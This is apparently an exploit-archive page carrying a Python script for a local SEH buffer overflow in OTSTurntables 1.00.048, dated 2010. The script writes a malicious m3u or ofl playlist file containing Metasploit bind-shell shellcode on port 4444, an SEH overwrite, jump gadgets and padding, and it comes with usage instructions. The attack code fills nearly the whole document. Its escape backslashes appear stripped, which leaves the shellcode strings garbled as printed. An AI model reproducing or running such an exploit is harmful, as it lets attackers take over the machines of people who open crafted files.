OTSTurntables 1.00.048 (m3u/ofl) Local BOF Exploit (SEH)

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : OTSTurntables 1.00.048 (m3u/ofl) Local BOF Exploit (SEH)
# Published : 2010-11-28
# Author : 0v3r
# Previous Title : Mediacoder 0.7.5.4792 Buffer Overflow Exploit (SEH)
# Next Title : CA Internet Security Suite 2010 KmxSbx.sys Kernel Pool Overflow 0 day Exploit
# Exploit Title: OTSTurntables 1.00.028 (m3u/ofl) Local BOF Exploit (SEH)
# Date: 11/24/2010
# Author: 0v3r
# Software Link: http://www.otsturntables.com/download-otsturntables-free/
# Version: 1.00.048
# Tested on: Windows XP SP3 EN
# CVE: N/A

#!/usr/bin/python

import sys

# win32_bind -  EXITFUNC=seh LPORT=4444 Size=696 Encoder=Alpha2 http://metasploit.com
shellcode = ("xebx03x59xebx05xe8xf8xffxffxffx49x48x49x49x49x49"
"x49x49x49x49x49x49x49x49x49x49x49x49x51x5ax6ax4a"
"x58x50x30x42x30x42x6bx42x41x5ax32x42x42x42x32x41"
"x42x41x30x41x41x58x50x38x42x42x75x4bx59x4bx4cx30"
"x6ax58x6bx52x6dx6dx38x38x79x39x6fx4bx4fx39x6fx75"
"x30x6ex6bx32x4cx71x34x34x64x6ex6bx31x55x37x4cx6e"
"x6bx33x4cx55x55x53x48x57x71x68x6fx6cx4bx50x4fx47"
"x68x6ex6bx53x6fx47x50x56x61x7ax4bx72x69x6ex6bx36"
"x54x4ex6bx63x31x38x6ex37x41x6bx70x4fx69x6cx6cx4b"
"x34x4bx70x52x54x64x47x6fx31x4bx7ax34x4dx46x61x59"
"x52x48x6bx5ax54x65x6bx73x64x41x34x77x58x74x35x6b"
"x55x4ex6bx61x4fx57x54x75x51x58x6bx70x66x6cx4bx36"
"x6cx42x6bx6ex6bx31x4fx67x6cx46x61x7ax4bx63x33x66"
"x4cx6cx4bx6cx49x50x6cx66x44x47x6cx53x51x6fx33x64"
"x71x4bx6bx41x74x4ex6bx63x73x56x50x6cx4bx63x70x76"
"x6cx6cx4bx52x50x67x6cx6cx6dx4cx4bx57x30x43x38x33"
"x6ex53x58x4cx4ex30x4ex76x6ex7ax4cx32x70x4bx4fx78"
"x56x62x46x66x33x61x76x75x38x66x53x36x52x75x38x71"
"x67x32x53x45x62x63x6fx56x34x6bx4fx6ex30x70x68x58"
"x4bx48x6dx4bx4cx35x6bx46x30x6bx4fx38x56x53x6fx4f"
"x79x6bx55x50x66x6ex61x48x6dx76x68x37x72x73x65x41"
"x7ax45x52x79x6fx38x50x30x68x4bx69x34x49x49x65x6e"
"x4dx66x37x6bx4fx7ax76x50x53x46x33x36x33x42x73x46"
"x33x57x33x50x53x41x53x32x73x6bx4fx4ex30x75x36x31"
"x78x77x61x73x6cx52x46x43x63x6dx59x58x61x4cx55x52"
"x48x4fx54x54x5ax50x70x4fx37x61x47x4bx4fx4ex36x30"
"x6ax76x70x73x61x71x45x39x6fx6ex30x30x68x69x34x6c"
"x6dx76x4ex49x79x66x37x79x6fx6bx66x63x63x42x75x59"
"x6fx7ax70x41x78x4dx35x57x39x6cx46x57x39x42x77x59"
"x6fx68x56x52x70x31x44x51x44x46x35x4bx4fx78x50x4e"
"x73x50x68x58x67x44x39x48x46x30x79x41x47x6bx4fx59"
"x46x51x45x6bx4fx6ex30x75x36x50x6ax70x64x32x46x62"
"x48x52x43x50x6dx6dx59x4dx35x63x5ax52x70x32x79x65"
"x79x38x4cx4fx79x69x77x30x6ax62x64x4bx39x6bx52x30"
"x31x4fx30x6ax53x6cx6ax39x6ex43x72x74x6dx59x6ex71"
"x52x74x6cx6fx63x4cx4dx50x7ax50x38x6cx6bx4ex4bx6c"
"x6bx33x58x33x42x59x6ex6fx43x45x46x39x6fx53x45x50"
"x44x79x6fx79x46x63x6bx50x57x71x42x71x41x70x51x50"
"x51x33x5ax74x41x42x71x32x71x76x35x30x51x69x6fx7a"
"x70x72x48x4ex4dx6ax79x53x35x6ax6ex30x53x79x6fx5a"
"x76x30x6ax6bx4fx39x6fx65x67x6bx4fx5ax70x6ex6bx72"
"x77x59x6cx6bx33x7ax64x70x64x49x6fx7ax76x76x32x6b"
"x4fx5ax70x30x68x6cx30x6fx7ax57x74x73x6fx73x63x6b"
"x4fx38x56x4bx4fx4ex30x4a")


# near jump 928 bytes encoded with Alpha2 encoder
jump = ("xebx03x59xebx05xe8xf8xffxffxffx49x49x49x49x49x49"
"x49x49x49x49x49x49x49x49x37x49x49x49x51x5ax6ax65"
"x58x50x30x41x31x41x42x6bx41x41x75x41x32x41x41x32"
"x42x41x30x42x41x58x38x41x42x50x75x38x69x49x79x55"
"x30x79x6cx4bx4fx4bx4fx65")

nopsled  = "x90" * 16
junk     = "x90" * (912 - len(shellcode)) 
nseh     = "xebx06x90x90"	           # short jump
seh      = "x3fx28xd1x72"		   # 0x72D1283F - ppr - msacm32.drv
jump     = "xe9x60xfcxffxff"	   # near jump
stuff	 = "x44" * 10000 

buff = junk + shellcode + nseh + seh + nopsled + jump + stuff



try:	
 	print "n"	
	print "---------------------------------------------------------------------------------"
	print "|          OTSTurntables 1.00.048 (m3u/ofl) Local BOF Exploit (SEH)            |"
	print "---------------------------------------------------------------------------------"
	print "n"
	
	if len(sys.argv)!=2:
	
     	  	print "Usage: exploit.py <option>n"
		print "File type options:"
		print "[1] m3u file"
		print "[2] ofl file"
      	 	sys.exit(0)


	if int(sys.argv[1]) == 1: 
		fname = "exploit.m3u"	
	elif int(sys.argv[1]) == 2 :
		fname = "exploit.ofl"
	else:	
		print "Check again the available options!"
		sys.exit(0)
	
	f = open(fname,'w')
	f.write(buff)
	f.close()
 
	print "- File ",fname," created..."
	print "- To run exploit open OTSTurntables 1.00.028 and import the file",fname 
except SystemExit:
	pass
except ValueError:
	print "Check again the available options!"
except:
	print "-Oooops! Can't write file...n"